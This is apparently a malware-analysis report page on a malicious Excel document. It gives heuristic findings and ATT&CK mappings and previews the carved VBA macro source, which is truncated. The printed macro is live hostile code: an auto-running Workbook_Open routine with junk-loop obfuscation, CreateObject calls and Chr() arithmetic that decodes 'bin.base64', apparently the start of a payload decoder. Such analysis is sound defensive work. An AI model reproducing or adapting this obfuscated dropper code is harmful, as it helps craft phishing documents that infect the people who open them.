MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Workbook_Open event, which is a common technique for initial execution. The macro code is heavily obfuscated, including reassembling API names from split string literals, indicating malicious intent. The primary goal appears to be downloading and executing a secondary payload, though the specific URL or mechanism is not directly extractable from the provided obfuscated code.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11768 bytes |
SHA-256: 7e782dbff70003b921fd5f077f6d1586ec6c835c035d8b0533ab43cfbcf4abe7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
x1RbJPD.YqYK8SL91e4PUszuZpw_
While 20 = 37
Dim spUxIM_V18d9EN As Boolean
Wend
Dim FRej7kjH4m As Worksheet
While 1 = 46
Dim qpJaJjjur5sU As Boolean
Wend
Dim kAtNzG3A4IFzsb4 As Worksheet
While 9 = 31
Dim EybHfZJbg35 As Boolean
Wend
Dim oW4LWSHuqczru As Worksheet
While 4 = 54
Dim bO3rfhTrqod As Boolean
Wend
Dim NvL4YhKU4adF As Worksheet
While 23 = 40
Dim quwp7uZOFpoO As Boolean
Wend
Dim ga58gK8rXPHf5 As Worksheet
While 6 = 42
Dim P4mUz_uvAtumu6M As Boolean
Wend
Dim MxhE7V7mMwrcvq As Worksheet
While 18 = 36
Dim YlOuEcektzncuZ As Boolean
Wend
Dim IL3ZAcIaiZ As Worksheet
While 26 = 48
Dim dSPYgGf9Dj As Boolean
Wend
Dim Fd2nbqlCrZbjf As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "x1RbJPD"
Dim feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY As String
Dim FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh As String
Dim hKdyKXw9AlZSJQCYSICEuAgiZCI6ACRVXFhKoFM5tPBN3FFAbh_ViCRfn4XHNz88SC5CsztL6FUc9QoR5GcaC5wTwBgtq_p4RD5zJDQlwvZaqyfUNEMEUe5WOj As String
Dim e8iJzRqVYwh1CwGL8C6rNRGg1oe8EXFuTIJiB3wvT5BkQHOIucZM6vnLyBRJvsPAowe3lhIDOIVROeNrYULk73xgd7t_jl9knA6clUgLSV8uYT6Rvj As Integer
Function b_4PbQf8BywkINKLqGdpyCrAugugW19d3vxXmzDpglDn_CRbYz_R84pYQ2e(kbn_yCU7lAVESmxBnj3M_cCawL6PdWumQVQsfIVnfo7qVEARCgopab)
While 24 = 36
Dim klqpS_7akTA As Boolean
Wend
Dim fKNBI4p1PH1 As Worksheet
While 8 = 40
Dim DNbyfoYc9C7MDI1 As Boolean
Wend
Dim fpXKTgMDxC7_ As Worksheet
Dim Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8
While 22 = 53
Dim f2WELzshbMd As Boolean
Wend
Dim cQBGT8i7J1QV9aD As Worksheet
While 20 = 30
Dim xRyImvhi2kk6sV As Boolean
Wend
Dim SkXQK44RY2EN_ As Worksheet
Dim iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB
While 14 = 35
Dim vLNdWmGBZrQjq5q As Boolean
Wend
Dim HesAyizN2DwgId As Worksheet
While 2 = 45
Dim CWpvUlELRkT33Fq As Boolean
Wend
Dim c9KI3G_Yd58VY As Worksheet
While 7 = 41
Dim jE8ffuMK_HTe As Boolean
Wend
Dim YfqMN7UtVR As Worksheet
While 12 = 30
Dim g7T_x88KzW As Boolean
Wend
Dim OokLlwUG2ebz1m As Worksheet
Set iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB = CreateObject(FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh)
While 2 = 37
Dim bkWJN7klCPg As Boolean
Wend
Dim AJf6OLxQ7Ot As Worksheet
While 22 = 41
Dim djakL11zqEqf As Boolean
Wend
Dim Liv63umkTokkyJk As Worksheet
feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY = Chr(339 - 241) & Chr(143 - 38) & Chr(368 - 258) & Chr(322 - 276) & Chr(344 - 246) & Chr(483 - 386) & Chr(257 - 142) & Chr(329 - 228) & Chr(264 - 210) & Chr(100 - 48)
While 25 = 38
Dim Qmg3Wrp2jw As Boolean
Wend
Dim UWtKYy4c9soZ1X As Worksheet
While 20 = 31
Dim JlGiy9yuANhK As Boolean
Wend
Dim IKRweqKHfV2Y4 As Worksheet
Set Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8 = iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB.createElement("I4VC7GToF7Z5uN")
While 28 = 51
Dim ypFya6zvHqujFC As Boolean
Wend
Dim k8iVdlMnrIKL As Worksheet
While 11 = 33
Dim Nr1xsrn9Qq6 As Boolean
Wend
Dim iRqY_d
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.